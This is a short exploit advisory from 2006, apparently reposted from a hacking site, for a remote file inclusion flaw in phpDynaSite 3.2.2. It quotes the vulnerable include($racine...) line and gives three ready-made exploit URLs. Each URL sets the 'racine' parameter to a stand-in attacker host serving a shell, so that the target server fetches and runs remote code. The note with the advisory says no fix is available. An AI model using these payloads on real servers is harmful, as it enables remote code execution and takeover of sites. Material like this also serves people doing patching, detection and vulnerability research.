phpDynaSite <= 3.2.2 (racine) Remote File Include Vulnerabilities

2006-11-04 00:00:00

**********************************************************************************************************
WwW.Deltahacking.NeT

**********************************************************************************************************

* dynasite3.2.2

* Class = Remote File Inclusion ;

* Download = http://jaist.dl.sourceforge.net:80/sourceforge/phpdynasite/dynasite3.2.2.tar.gz

* Found by = Dr.Pantagon ([email protected])

-------------------------------------------------------------------------------------------------------------------


- Vulnerable Code

include($racine."connection.php");

++++++++++++++++++++++++++++++++++++++++++++

- Exploit:


http://[target]/[path]/function_log.php?racine=http://evilsite.com/shell?
http://[target]/[path]/function_balise_url.php?racine=http://evilsite.com/shell?
http://[target]/[path]/connection.php?racine=http://evilsite.com/shell?


------------------------------------------------------------------------------------------------------------------

Gr33tz: Dr.Torojan

**************************************************************************************************************

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.